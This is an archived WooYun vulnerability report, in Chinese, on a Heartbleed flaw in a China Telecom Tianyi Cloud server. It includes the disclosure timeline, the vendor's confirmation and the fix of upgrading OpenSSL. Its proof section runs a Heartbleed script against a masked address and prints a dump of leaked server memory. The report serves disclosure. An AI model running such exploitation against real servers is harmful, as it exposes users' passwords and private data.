漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0154477
漏洞标题:中国电信天翼云存在心血漏洞(可泄露用户密码)
相关厂商:天翼云
漏洞作者: 共产党员
提交时间:2015-11-20 13:00
修复时间:2016-01-11 15:32
公开时间:2016-01-11 15:32
漏洞类型:系统/服务补丁不及时
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-20: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开
简要描述:
RT
详细说明:
**.**.**.** 存在心血漏洞
可以获取密码等敏感信息,多的就不抓了。
漏洞证明:
sudo python pyheartbleed.py **.**.**.**
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 3461
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 00 00 40 14 00 00 24 53 12 E7 54 01 3E .@...@...$S..T.>
0010: 57 42 D7 80 0F F3 7F A8 32 62 26 43 46 7E E5 8A WB......2b&CF~..
0020: 3D 8A 55 C2 5D 09 CC 7D 3D D8 7F A2 05 BC B6 D9 =.U.]..}=.......
0030: 2A 81 C5 BD 83 8F 05 8E 79 9E 6A 55 04 7F 66 E5 *.......y.jU..f.
0040: CE F1 03 03 03 03 50 00 16 00 04 00 05 00 0A 00 ......P.........
0050: 09 00 64 00 62 00 03 00 06 00 13 00 12 00 63 01 ..d.b.........c.
0060: 00 00 05 FF 01 00 01 00 6D 00 05 00 05 01 00 00 ........m.......
0070: 00 00 00 0A 00 08 00 06 00 19 00 17 00 18 00 0B ................
0080: 00 02 01 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 CF 10 5F AD ....#........._.
00e0: 8D 07 21 57 30 86 A9 BA 24 1F 50 73 6C 74 C1 13 ..!W0...$.Pslt..
00f0: A2 A7 7F C5 BB E7 78 D7 B2 C1 79 80 B2 E5 60 00 ......x...y...`.
0100: 03 4E D9 B8 33 DE A0 B5 1A EF 91 6F ED 56 41 B6 .N..3......o.VA.
0110: 21 41 70 5C 48 B8 02 D2 A2 6B D0 7D 0A 65 7A 68 !Ap\H....k.}.ezh
0120: 55 B9 F0 E6 B2 69 F9 5B 92 1A F7 D9 16 54 EB 9E U....i.[.....T..
0130: 91 56 9B 67 A9 93 69 2D 14 65 CE 96 F2 E7 DF D7 .V.g..i-.e......
0140: 8B F7 03 07 D9 B8 F7 21 3C 0E AF 1D B9 A1 30 86 .......!<.....0.
0150: AA DD A1 64 00 0D 00 16 00 14 06 01 06 03 05 01 ...d............
0160: 05 03 04 01 04 03 03 01 03 03 02 01 02 03 00 05 ................
0170: 00 05 01 00 00 00 00 33 74 00 00 00 12 00 00 00 .......3t.......
0180: 10 00 1A 00 18 08 68 74 74 70 2F 31 2E 31 08 73 ......http/1.1.s
0190: 70 64 79 2F 33 2E 31 05 68 32 2D 31 34 75 50 00 pdy/3.1.h2-14uP.
01a0: 00 00 0B 00 02 01 00 00 0A 00 06 00 04 00 17 00 ................
01b0: 18 00 15 00 4B 00 00 00 00 00 00 00 00 00 00 00 ....K...........
01c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0200: 26 75 5F 68 69 73 3D 33 26 75 5F 6A 61 76 61 3D &u_his=3&u_java=
0210: 31 26 75 5F 68 3D 37 36 38 26 75 5F 77 3D 31 30 1&u_h=768&u_w=10
0220: 32 34 26 75 5F 61 68 3D 37 33 38 26 75 5F 61 77 24&u_ah=738&u_aw
0230: 3D 31 30 32 34 26 75 5F 63 64 3D 33 32 26 75 5F =1024&u_cd=32&u_
0240: 6E 70 6C 75 67 3D 30 26 75 5F 6E 6D 69 6D 65 3D nplug=0&u_nmime=
0250: 30 26 64 66 66 3D 25 45 35 25 41 45 25 38 42 25 0&dff=%E5%AE%8B%
0260: 45 34 25 42 44 25 39 33 26 64 66 73 3D 31 33 26 E4%BD%93&dfs=13&
0270: 61 64 78 3D 36 39 39 26 61 64 79 3D 31 31 38 35 adx=699&ady=1185
0280: 26 62 69 77 3D 31 30 30 33 26 62 69 68 3D 35 36 &biw=1003&bih=56
0290: 38 26 6F 69 64 3D 33 26 72 65 66 3D 68 74 74 70 8&oid=3&ref=http
02a0: 25 33 41 25 32 46 25 32 46 72 65 61 64 2E 68 75 %3A%2F%2Fread.hu
02b0: 61 62 69 61 6E 2E 63 6F 6D 25 32 46 6D 69 6E 69 **.**.**.**%2Fmini
02c0: 25 32 46 73 68 6F 77 33 37 33 35 5F 33 2E 68 74 %2Fshow3735_3.ht
02d0: 6D 6C 26 72 78 3D 30 26 65 61 65 3D 34 26 66 63 ml&rx=0&eae=4&fc
修复方案:
升级openssl
版权声明:转载请注明来源 共产党员@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2015-11-24 17:35
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置。
最新状态:
暂无